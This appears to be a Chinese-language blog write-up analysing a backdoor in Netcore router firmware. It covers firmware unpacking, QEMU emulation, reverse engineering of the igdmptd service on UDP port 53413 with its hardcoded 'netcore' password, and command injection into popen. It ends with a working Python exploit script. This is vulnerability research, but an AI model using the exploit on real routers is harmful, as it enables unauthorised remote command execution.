NetCore 后门RCE漏洞

| 0 | 前言

netcore路由器设备中存在硬编码的登录密码,可以通过登录+命令注入实现执行任意系统命令、上传/下载文件、控制路由器任意命令执行

| 1 | 固件下载&解包&qemu配置

固件下载

下载地址

固件解包

1
binwalk -e --preserve-symlinks T1.bin

qemu配置

本固件是socket服务,我习惯使用qemusystem仿真

下载所需的qemu,内核文件

debian_wheezy_mipsel_standard.qcow2

vmlinux-3.2.0-4-4kc-malta

将文件复制到虚拟机中,在同一路径下创建start.sh,赋予可执行权限+x

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#!/bin/bash
# TAP接口配置
TAP_IF="tap0"
BR_IF="br0"

# 确保 tap0 存在,并添加进 br0
sudo ip tuntap add dev $TAP_IF mode tap
sudo ip link set $TAP_IF up
sudo brctl addif $BR_IF $TAP_IF

sudo qemu-system-mipsel \
    -M malta \
    -kernel vmlinux-3.2.0-4-4kc-malta \
    -hda debian_wheezy_mipsel_standard.qcow2 \
    -append "root=/dev/sda1 console=tty0" \
    -net nic,macaddr=00:16:3e:00:00:01 \
    -net tap,ifname=tap0,script=no,downscript=no \
    -nographic

启动qemu后将固件的文件系统通过scp传入qemu中

| 2 | 逆向分析

找到/etc/rcS,打开发现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
#!/bin/sh
DIRS=/var/tmp /var/run /var/ppp /var/udhcpc

mount -t tmpfs -o size=16m tmpfs /var
mount -t proc proc proc
mount -t sysfs sysfs /sys
mount -t devpts devpts /dev/pts
mkdir /var/parame
##mkdir /var/parame/brk
mkdir /var/parame/parame
/bin/param_load /var/parame/parame/param.tar.gzip

cp -rf /cfg /var/
rm -f /var/cfg/VERSION
#cp -f /web/lua/cfg/* /var/
mkdir /var/tmp
mkdir /var/tmp/bulletin/
mkdir /var/tmp/param
mkdir /var/run
mkdir /var/run/lock
mkdir /var/dnrd
mkdir /var/ppp
cp -f /sh/ppp/* /var/ppp
cp /web/cgi-bin/cgitest.cgi /var/tmp/
mkdir /var/udhcpc
> /etc/resolv.conf

cp -f /etc/VERSION /var/tmp/version_1
#insmod /lib/modules/ctf.ko
insmod /lib/modules/emf.ko
insmod /lib/modules/igs.ko
insmod /lib/modules/et.ko
#insmod /lib/modules/bcm57xx.ko
insmod /lib/modules/wl.ko
insmod /lib/modules/pptp.ko
insmod /lib/modules/ipsec.ko

vconfig set_name_type VLAN_PLUS_VID_NO_PAD
ifconfig eth0 up

vconfig add eth0 2
vconfig add eth0 3
vconfig add eth0 4
vconfig add eth0 5

vconfig add eth0 10
vconfig add eth0 11
vconfig add eth0 12
vconfig add eth0 13

brctl addbr br0
brctl addif br0 eth1

brctl addif br0 vlan10
brctl addif br0 vlan11
brctl addif br0 vlan12
brctl addif br0 vlan13

ifconfig eth1 up
brctl setfd br0 0
ifconfig br0 up
brctl stp br0 off

ifconfig vlan10 up
ifconfig vlan11 up
ifconfig vlan12 up
ifconfig vlan13 up

#insmod /lib/modules/main.ko
#setvlan 31 0 0 0 0
ifconfig pppoe up
ifconfig vir1 hw ether 00:00:00:00:51:88
ifconfig vir1 up
ifconfig lo 127.0.0.1
#add by zhouqingwei
checknvram
cfe_update -d
/bin/switch -d
sleep 5
mkdir /tmp/usb
#echo fuck
#/bin/cmac -d
/bin/igdmptd -d
#echo fuck1

可以看到可执行文件的路径/bin/igdmptd,我们将其提取出来

1
2
3
4
5
6
7
[*] '/home/zer00ne/Desktop/cve_review/stage1/netcore/_T1.bin.extracted/squashfs-root/igdmptd'
    Arch:       mips-32-little
    RELRO:      No RELRO
    Stack:      No canary found
    NX:         NX disabled
    PIE:        No PIE (0x400000)
    RWX:        Has RWX segments

将其放入IDA中分析

1752153503516

main函数先是fork子进程,再退出父进程.这会给我们的调试带来很大的麻烦,这里我直接把call create_daemonpatchnop,不会影响程序逻辑.

1752153753391

create_server函数创建了个套接字,然后bind0.0.0.0:53413

这里本应该是大端序显示,但是不知道为什么不管是checksec还是IDA都给识别成小端序了(🤔🤔🤔)

我们继续进入operate_loop

1752153932494

首次接受数据后,因为v20,所以不会进入这个if(v2)

我们看到与这个if对应的else

1752154024874

将接收到的数据复制一份,放在v5中,然后进入do_mptlogin

1752154075672

这个call_mpptlogin函数与登录有关

1752154105836

逻辑简单到直接把输入数据的一部分与netcore对比,属于严重的硬编码密码

如果密码正确,就会返回0

1752154175527

1752154189485

最终do_mptlogin也会返回0,v2会被赋值为1,代表已登录

此时我们可以进入if(v2)

1752154273496

根据输入数据的2,4字节的拼接出的token,选择进入不同的函数中处理

1752154351239

我们直接看到最后一个后门函数do_syscmd中,然后逆向分析token的条件

buf[2]!= '?' && '$',token == 0,sizeof(payload) != 8这三个条件才能使得进入sys

1752154619828

把我们输入的数据接过复杂的拼接后直接传给popen,使得我们能够RCE

调试分析

关于密码的输入,我选择第一次发送b"abcdefghijklmnopqrstuvwxyz",然后查看那部分被用于和netcore进行strcmp

1752154822820

所以我们这样写第一段payload =b'a'*8+b"netcore\x00"

然后我们逆向第二段的命令注入位置

先构造第二段的payloadpayload=b"\x00\x00\x00\x00"+b"abcdefghijklmnopqrstuvwxyz"

1752155136236

所以第二段payload应该为#payload=b"\x00\x00\x00\x00"+b'b'*4+f"{cmd}".encode()

我们试着输入cmd="echo I needed to control you >> /tmp/pwn.txt\x00"

1752155311034

可以看到我们执行了此命令

| 3 | EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from socket import *
from pwn import *
import socket
target_ip = "192.168.52.134"
target_port = 53413

payload =b'a'*8+b"netcore\x00"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # UDP
sock.sendto(payload, (target_ip, target_port))
pause()

payload=b"\x00\x00\x00\x00"+b'b'*4+b"echo I needed to control you >> /tmp/pwn.txt\x00\x00"
sock.sendto(payload, (target_ip, target_port))

sock.close()